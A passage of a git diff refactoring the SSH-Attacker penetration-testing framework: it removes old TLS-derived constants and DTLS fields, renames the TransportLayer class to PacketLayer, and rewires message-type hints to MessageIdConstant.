AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE( - (byte) 63, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_ERROR( - (byte) 64, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_ERRTOK( - (byte) 65, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_MIC( - (byte) 66, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - // [ RFC 4254 ] - SSH_MSG_GLOBAL_REQUEST((byte) 80), - SSH_MSG_REQUEST_SUCCESS((byte) 81), - SSH_MSG_REQUEST_FAILURE((byte) 82), - // 83 - 89 unassigned (connection protocol generic) - SSH_MSG_CHANNEL_OPEN((byte) 90), - SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 91), - SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 92), - SSH_MSG_CHANNEL_WINDOW_ADJUST((byte) 93), - SSH_MSG_CHANNEL_DATA((byte) 94), - SSH_MSG_CHANNEL_EXTENDED_DATA((byte) 95), - SSH_MSG_CHANNEL_EOF((byte) 96), - SSH_MSG_CHANNEL_CLOSE((byte) 97), - SSH_MSG_CHANNEL_REQUEST((byte) 98), - SSH_MSG_CHANNEL_SUCCESS((byte) 99), - SSH_MSG_CHANNEL_FAILURE((byte) 100), - // 101 - 127 unassigned (channel related messages) - // 128 - 191 reserved (for client protocols) - // 192 - 255 reserved for private use (local extensions) - UNKNOWN((byte) 255); - - private byte value; - private final Enum[] specificTo; - - private static final Map MAP; - - private ProtocolMessageType(byte value) { - this.value = value; - this.specificTo = new Enum[] {}; - } - - private ProtocolMessageType(byte value, Enum... specificTo) { - this.value = value; - this.specificTo = specificTo; - } - - static { - MAP = new HashMap<>(); - for (ProtocolMessageType cm : ProtocolMessageType.values()) { - MAP.put(cm.value, cm); - } - } - - public static ProtocolMessageType getContentType(byte value) { - return MAP.get(value); - } - - public byte getValue() { - return value; - } - - public byte[] getArrayValue() { - return new byte[] {value}; - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/SessionByteLength.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/SessionByteLength.java deleted file mode 100644 index b04ff85e9..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/SessionByteLength.java +++ /dev/null @@ -1,29 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.constants; - -public class SessionByteLength { - - /** Content Type length */ - public static final int CONTENT_TYPE = 1; - /** Record length length */ - public static final int RECORD_LENGTH = 2; - - /** protocol version byte length */ - public static final int PROTOCOL_VERSION = 2; - - public static final int SEQUENCE_NUMBER = 8; - - /** epoch for DTLS */ - public static final int DTLS_EPOCH = 2; - - /** sequence number for DTLS */ - public static final int DTLS_SEQUENCE_NUMBER = 6; - - private SessionByteLength() {} -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/DecryptionCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/DecryptionCipher.java deleted file mode 100644 index 2ace49acd..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/DecryptionCipher.java +++ /dev/null @@ -1,32 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.crypto.cipher; - -import de.rub.nds.sshattacker.core.exceptions.CryptoException; - -/** */ -public interface DecryptionCipher { - - public int getBlocksize(); - - public byte[] decrypt(byte[] someBytes) throws CryptoException; - - public byte[] decrypt(byte[] iv, byte[] someBytes) throws CryptoException; - - public byte[] decrypt(byte[] iv, int tagLength, byte[] someBytes) throws CryptoException; - - public byte[] decrypt( - byte[] iv, int tagLength, byte[] additionAuthenticatedData, byte[] someBytes) - throws CryptoException; - - public byte[] getIv(); - - public void setIv(byte[] iv); - - EncryptionCipher getEncryptionCipher(); -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/EncryptionCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/EncryptionCipher.java deleted file mode 100644 index 3a2350d3f..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/EncryptionCipher.java +++ /dev/null @@ -1,32 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.crypto.cipher; - -import de.rub.nds.sshattacker.core.exceptions.CryptoException; - -/** */ -public interface EncryptionCipher { - - public int getBlocksize(); - - public byte[] encrypt(byte[] someBytes) throws CryptoException; - - public byte[] encrypt(byte[] iv, byte[] someBytes) throws CryptoException; - - public byte[] encrypt(byte[] iv, int tagLength, byte[] someBytes) throws CryptoException; - - public byte[] encrypt( - byte[] iv, int tagLength, byte[] additionAuthenticatedData, byte[] someBytes) - throws CryptoException; - - public byte[] getIv(); - - public void setIv(byte[] iv); - - DecryptionCipher getDecryptionCipher(); -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java index 8b30d6eb3..2d722cc0c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java @@ -28,8 +28,8 @@ public class LayerStack { private static final Logger LOGGER = LogManager.getLogger(); /** - * The layer list, layer 0 is the highest layer, layer n is the lowest. Eg. For TLS layer 0 - * could be the application layer, layer 1 the tls message layer layer 2 the record layer and + * The layer list, layer 0 is the highest layer, layer n is the lowest. Eg. For SSH layer 0 + * could be the SSHv1 layer, layer 1 the ssh transport layer 2 and * layer 3 the tcp transport layer, layer 4 could be the ip layer layer 5 could be the ethernet * layer. Not all layers need to be defined at any time, it is perfectly fine to leave the layer * stack and plug another component in which does the rest of the processing diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java index 1916d045f..3660b811d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java @@ -16,11 +16,11 @@ import org.apache.logging.log4j.Logger; /** - * Creates a layerStack based on pre-defined configurations. E.g., to send TLS messages with - * TLS-Attacker, we have to produce a layerStack that contains the MessageLayer, RecordLayer, and + * Creates a layerStack based on pre-defined configurations. E.g., to send SSHv2 messages with + * SSH-Attacker, we have to produce a layerStack that contains the SSHv2, TransportLayer, and * TcpLayer. Each layer is assigned a different context. */ -public class LayerStackFactory { +public final class LayerStackFactory { private static final Logger LOGGER = LogManager.getLogger(); public static LayerStack createLayerStack(LayerConfiguration type, Context context) { @@ -32,20 +32,20 @@ public static LayerStack createLayerStack(LayerConfiguration type, Context conte TcpContext tcpContext = context.getTcpContext(); switch (type) { - case SSHv1: + case SSHV1: layerStack = new LayerStack( context, new SSH1Layer(sshContext), - new TransportLayer(sshContext), + new PacketLayer(sshContext), new TcpLayer(tcpContext)); return layerStack; - case SSHv2: + case SSHV2: layerStack = new LayerStack( context, new SSH2Layer(sshContext), - new TransportLayer(sshContext), + new PacketLayer(sshContext), new TcpLayer(tcpContext)); return layerStack; default: diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/Message.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/Message.java index 7f60eedec..4e1815f4a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/Message.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/Message.java @@ -16,8 +16,8 @@ import jakarta.xml.bind.annotation.XmlSeeAlso; /** - * Abstract class for different messages the TLS-Attacker can send. This includes but is not limited - * to TLS-Messages. + * Abstract class for different messages the SSH-Attacker can send. This includes but is not limited + * to SSH-Messages. * * @param The message class itself * @param The type of context this message needs to use, relates to the messages' layer. diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index 7447b596b..80a369cd8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -28,11 +28,11 @@ * itself. It can send messages using the layer below and forward received messages to the layer * above. * - * @param Some layers need a hint which message they should send or receive. - * @param The kind of messages/Containers this layer is able to send and receive. + * @param Some layers need a hint which message they should send or receive. + * @param The kind of messages/Containers this layer is able to send and receive. */ public abstract class ProtocolLayer< - Hint extends LayerProcessingHint, Container extends DataContainer> { + HintT extends LayerProcessingHint, ContainerT extends DataContainer> { private static final Logger LOGGER = LogManager.getLogger(); @@ -40,9 +40,9 @@ public abstract class ProtocolLayer< private ProtocolLayer lowerLayer = null; - private LayerConfiguration layerConfiguration; + private LayerConfiguration layerConfiguration; - private List producedDataContainers; + private List producedDataContainers; protected HintedInputStream currentInputStream = null; @@ -76,10 +76,10 @@ public void setLowerLayer(ProtocolLayer lowerLayer) { public abstract LayerProcessingResult sendConfiguration() throws IOException; - public abstract LayerProcessingResult sendData(Hint hint, byte[] additionalData) + public abstract LayerProcessingResult sendData(HintT hintT, byte[] additionalData) throws IOException; - public LayerConfiguration getLayerConfiguration() { + public LayerConfiguration getLayerConfiguration() { return layerConfiguration; } @@ -87,7 +87,7 @@ public void setLayerConfiguration(LayerConfiguration layerConfiguration) { this.layerConfiguration = layerConfiguration; } - public LayerProcessingResult getLayerResult() { + public LayerProcessingResult getLayerResult() { boolean isExecutedAsPlanned = executedAsPlanned(); return new LayerProcessingResult( producedDataContainers, getLayerType(), isExecutedAsPlanned, getUnreadBytes()); @@ -122,11 +122,11 @@ public void clear() { nextInputStream = null; } - protected void addProducedContainer(Container container) { + protected void addProducedContainer(ContainerT container) { producedDataContainers.add(container); } - protected boolean containerAlreadyUsedByHigherLayer(Container container) { + protected boolean containerAlreadyUsedByHigherLayer(ContainerT container) { if (producedDataContainers == null) { return false; } @@ -234,7 +234,7 @@ public LayerType getLayerType() { * @param container The container to handle. * @param context The context of the connection. Keeps parsed and handled values. */ - protected void readDataContainer(Container container, LayerContext context) { + protected void readDataContainer(ContainerT container, LayerContext context) { HintedInputStream inputStream; try { inputStream = getLowerLayer().getDataStream(); @@ -247,8 +247,6 @@ protected void readDataContainer(Container container, LayerContext context) { try { parser.parse(container); - Preparator preparator = container.getPreparator(context); - preparator.prepareAfterParse(false); // TODO REMOVE THIS CLIENTMODE FLAG Handler handler = container.getHandler(context); handler.adjustContext(container); addProducedContainer(container); @@ -258,13 +256,11 @@ protected void readDataContainer(Container container, LayerContext context) { } protected void readContainerFromStream( - Container container, LayerContext context, HintedInputStream inputStream) { + ContainerT container, LayerContext context, HintedInputStream inputStream) { Parser parser = container.getParser(context, inputStream); try { parser.parse(container); - Preparator preparator = container.getPreparator(context); - preparator.prepareAfterParse(false); // TODO REMOVE THIS CLIENTMODE FLAG Handler handler = container.getHandler(context); handler.adjustContext(container); addProducedContainer(container); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java index 3ec31ac82..120618332 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java @@ -7,12 +7,12 @@ */ package de.rub.nds.sshattacker.core.layer.constant; -/** Holds all implemented layers of the TLS-Core, not limited to any layer of the ISO stack */ +/** Holds all implemented layers of the SSH-Core, not limited to any layer of the ISO stack */ public enum ImplementedLayers implements LayerType { TCP, - TransportLayer, - SSHv1, - SSHv2; + PACKET_LAYER, + SSHV1, + SSHV2; @Override public String getName() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java index c1e9e2564..201f7dd09 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java @@ -8,11 +8,10 @@ package de.rub.nds.sshattacker.core.layer.constant; /** - * Pre-defined configurations for the Layer Stack. E.g., DTLS would add the UDP-, Record-, - * Fragmentation-, and Message- Layer to the LayerStack. Custom LayerStack have to be created - * manually. + * Pre-defined configurations for the Layer Stack. E.g., SSHv1 will Create a Layerstack containing no SSHv2 Layer to + * the LayerStack. Custom LayerStack have to be created manually. */ public enum LayerConfiguration { - SSHv1, - SSHv2; + SSHV1, + SSHV2; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index b57a248ca..bd31487d0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -34,23 +34,12 @@ import java.util.HashMap; import java.util.List; import java.util.Optional; -import java.util.Random; public class SshContext extends LayerContext { /** Static configuration for SSH-Attacker */ private Chooser chooser; - public Random getRandom() { - return random; - } - - public void setRandom(Random random) { - this.random = random; - } - - private Random random; - public AbstractPacketEncryptor getEncryptor() { return encryptor; } @@ -252,16 +241,6 @@ public PacketCipher getActiveDecryptCipher() { private KeySet keySet; // endregion - /* public MessageLayer getMessageLayer() { - return messageLayer; - } - - public void setMessageLayer(MessageLayer messageLayer) { - this.messageLayer = messageLayer; - } - - private MessageLayer messageLayer = new MessageLayer(this.getContext());*/ - // region Connection Protocol private ChannelManager channelManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/DataContainer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/DataContainer.java index 7deef92cd..116f2abdf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/DataContainer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/DataContainer.java @@ -11,7 +11,7 @@ import java.io.InputStream; /** - * All protocol messages are abstracted with the DataContainer interface. For TLS-Attacker to work + * All protocol messages are abstracted with the DataContainer interface. For SSH-Attacker to work * with data it only needs to know how to parse, prepare, serialize and handle the message. All * messages must therefore provide this functionality. */ diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Handler.java index b91c09f45..476a1a77b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Handler.java @@ -10,6 +10,7 @@ /** * @param The Object that should be Handled */ +@FunctionalInterface public interface Handler { void adjustContext(T object); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java index f86363db9..17876c318 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java @@ -32,15 +32,6 @@ public Preparator(Chooser chooser, T object) { public abstract void prepare(); - /** - * If clientMode is active, the prepareAfterParse method will compute all the values as though - * the client parsed this Method. This is mostly only useful if you are reparsing or doing - * something really crazy. For any normal use case this should be set to false; - * - * @param clientMode see above - */ - public void prepareAfterParse(boolean clientMode) {} - public T getObject() { return object; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java index e42f01f71..a5cd7c70b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java @@ -83,7 +83,7 @@ public final void appendBigInteger(BigInteger i, int length) { byte[] bytes; // special case for which bigIntegerToByteArray // wrongly returns an empty array - if (i.equals(new BigInteger("0"))) { + if (i.equals(BigInteger.ZERO)) { bytes = ArrayConverter.intToBytes(0, length); } else { bytes = ArrayConverter.bigIntegerToByteArray(i, length, true); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java index 842cfc454..05c233bac 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java @@ -7,7 +7,7 @@ */ package de.rub.nds.sshattacker.core.layer.hints; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import java.util.Objects; /** @@ -16,33 +16,18 @@ */ public class PacketLayerHint implements LayerProcessingHint { - private final ProtocolMessageType type; - - private final Integer epoch; + private final MessageIdConstant type; private final Integer sequenceNumber; - private final Integer messageSequence; - - public PacketLayerHint(ProtocolMessageType type) { + public PacketLayerHint(MessageIdConstant type) { this.type = type; - this.epoch = null; this.sequenceNumber = null; - this.messageSequence = null; } - public PacketLayerHint(ProtocolMessageType type, int epoch, int sequenceNumber) { + public PacketLayerHint(MessageIdConstant type, int epoch, int sequenceNumber) { this.type = type; - this.epoch = epoch; this.sequenceNumber = sequenceNumber; - this.messageSequence = null; - } - - public PacketLayerHint(ProtocolMessageType type, int messageSequence) { - this.type = type; - this.epoch = null; - this.sequenceNumber = null; - this.messageSequence = messageSequence; } @Override @@ -52,15 +37,9 @@ public boolean equals(Object other) { if (this.type == otherHint.type) { return true; } - if (this.epoch == otherHint.epoch) { - return false; - } if (this.sequenceNumber == otherHint.sequenceNumber) { return true; } - if (this.messageSequence == otherHint.messageSequence) { - return true; - } } return false; } @@ -69,25 +48,15 @@ public boolean equals(Object other) { public int hashCode() { int hash = 3; hash = 79 * hash + Objects.hashCode(this.type); - hash = 79 * hash + Objects.hashCode(this.epoch); hash = 79 * hash + Objects.hashCode(this.sequenceNumber); - hash = 79 * hash + Objects.hashCode(this.messageSequence); return hash; } - public ProtocolMessageType getType() { + public MessageIdConstant getType() { return type; } - public Integer getEpoch() { - return epoch; - } - public Integer getSequenceNumber() { return sequenceNumber; } - - public Integer getMessageSequence() { - return messageSequence; - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java similarity index 75% rename from SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java rename to SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index ca2b20c97..7a487e0d3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -10,7 +10,6 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.PacketLayerType; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; @@ -39,13 +38,13 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class TransportLayer extends ProtocolLayer { +public class PacketLayer extends ProtocolLayer { private static final Logger LOGGER = LogManager.getLogger(); private SshContext context; - public TransportLayer(SshContext context) { - super(ImplementedLayers.TransportLayer); + public PacketLayer(SshContext context) { + super(ImplementedLayers.PACKET_LAYER); this.context = context; } @@ -59,8 +58,6 @@ public LayerProcessingResult sendConfiguration() throws IOException { continue; } - // MessageLayer messageLayer = context.getMessageLayer(); - try { // AbstractPacket packet = messageLayer.serialize(message); Preparator preparator = packet.getPreparator(context); @@ -88,7 +85,7 @@ public LayerProcessingResult sendData( "[bro] sending hint {} with data {}", hint.getType(), ArrayConverter.bytesToHexString(additionalData)); - ProtocolMessageType type = ProtocolMessageType.UNKNOWN; + MessageIdConstant type = MessageIdConstant.UNKNOWN; if (hint != null) { type = hint.getType(); } else { @@ -228,7 +225,7 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) if (packet instanceof BlobPacket) { String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); if (rawText.startsWith("SSH-")) { - return new PacketLayerHint(ProtocolMessageType.VERSION_EXCHANGE_MESSAGE); + return new PacketLayerHint(MessageIdConstant.VERSION_EXCHANGE_MESSAGE); } else { final AsciiMessage message = new AsciiMessage(); AsciiMessageParser parser = new AsciiMessageParser(new ByteArrayInputStream(raw)); @@ -245,7 +242,7 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) LOGGER.warn( "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); } - return new PacketLayerHint(ProtocolMessageType.ASCII_MESSAGE); + return new PacketLayerHint(MessageIdConstant.ASCII_MESSAGE); } } @@ -261,191 +258,191 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext())) { case SSH_MSG_DISCONNECT: LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DISCONNECT); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_DISCONNECT); case SSH_MSG_IGNORE: LOGGER.debug("[bro] returning SSH_MSG_IGNORE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_IGNORE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_IGNORE); case SSH_MSG_UNIMPLEMENTED: LOGGER.debug("[bro] returning SSH_MSG_UNIMPLEMENTED Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_UNIMPLEMENTED); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_UNIMPLEMENTED); case SSH_MSG_DEBUG: LOGGER.debug("[bro] returning SSH_MSG_DEBUG Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DEBUG); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_DEBUG); case SSH_MSG_SERVICE_ACCEPT: LOGGER.debug("[bro] returning SSH_MSG_SERVICE_ACCEPT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_ACCEPT); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_SERVICE_ACCEPT); case SSH_MSG_EXT_INFO: LOGGER.debug("[bro] returning SSH_MSG_EXT_INFO Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_EXT_INFO); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_EXT_INFO); case SSH_MSG_NEWCOMPRESS: LOGGER.debug("[bro] returning SSH_MSG_NEWCOMPRESS Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWCOMPRESS); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_NEWCOMPRESS); case SSH_MSG_KEXINIT: LOGGER.debug("[bro] returning SSH KEX INIT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXINIT); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXINIT); case SSH_MSG_NEWKEYS: LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_NEWKEYS); case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REQUEST_OLD Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REQUEST_OLD); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_REQUEST_OLD); case SSH_MSG_KEX_DH_GEX_REQUEST: LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REQUEST Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REQUEST); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_REQUEST); case SSH_MSG_KEX_DH_GEX_GROUP: LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_GROUP Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_GROUP); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_GROUP); case SSH_MSG_KEX_DH_GEX_INIT: LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_INIT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_INIT); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_INIT); case SSH_MSG_KEX_DH_GEX_REPLY: LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REPLY Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REPLY); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_REPLY); case SSH_MSG_KEXDH_INIT: LOGGER.debug("[bro] returning SSH_MSG_KEXDH_INIT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXDH_INIT); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXDH_INIT); case SSH_MSG_KEXDH_REPLY: LOGGER.debug("[bro] returning SSH_MSG_KEXDH_REPLY Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXDH_REPLY); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXDH_REPLY); case SSH_MSG_HBR_INIT: LOGGER.debug("[bro] returning SSH_MSG_HBR_INIT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_INIT); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_HBR_INIT); case SSH_MSG_HBR_REPLY: LOGGER.debug("[bro] returning SSH_MSG_HBR_REPLY Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_REPLY); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_HBR_REPLY); case SSH_MSG_SERVICE_REQUEST: LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_REQUEST); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_SERVICE_REQUEST); case SSH_MSG_KEX_ECDH_INIT: LOGGER.debug("[bro] returning SSH_MSG_KEX_ECDH_INIT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_ECDH_INIT); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_ECDH_INIT); case SSH_MSG_KEX_ECDH_REPLY: LOGGER.debug("[bro] returning SSH_MSG_KEX_ECDH_REPLY Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_ECDH_REPLY); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_ECDH_REPLY); case SSH_MSG_ECMQV_INIT: LOGGER.debug("[bro] returning SSH_MSG_ECMQV_INIT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_ECMQV_INIT); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_ECMQV_INIT); case SSH_MSG_ECMQV_REPLY: LOGGER.debug("[bro] returning SSH_MSG_ECMQV_REPLY Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_ECMQV_REPLY); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_ECMQV_REPLY); case SSH_MSG_KEXRSA_PUBKEY: LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_PUBKEY Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXRSA_PUBKEY); + return new 